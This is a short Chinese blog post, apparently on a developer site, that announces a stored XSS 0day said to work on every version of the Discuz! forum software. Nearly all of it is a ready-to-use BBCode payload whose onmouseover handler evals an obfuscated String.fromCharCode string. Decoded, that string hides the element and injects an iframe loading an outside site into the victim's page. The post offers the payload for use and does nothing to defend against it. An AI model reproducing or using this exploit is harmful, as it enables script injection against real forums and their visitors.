Discuz!所有版本通杀 存储型XSS 0day

发贴时勾选源码,

鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的把上面的alert(/DZ-XSS-0DAY/)换成

[email][url][img]http://www.i0day.comοnmοuseοver=eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,105,48,34,43,34,100,97,121,46,99,111,109,34,59,102,46,104,101,105,103,104,116,61,34,52,48,48,34,59,102,46,119,105,100,116,104,61,34,56,48,48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,102,41,59)); [/img][/url][/email]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值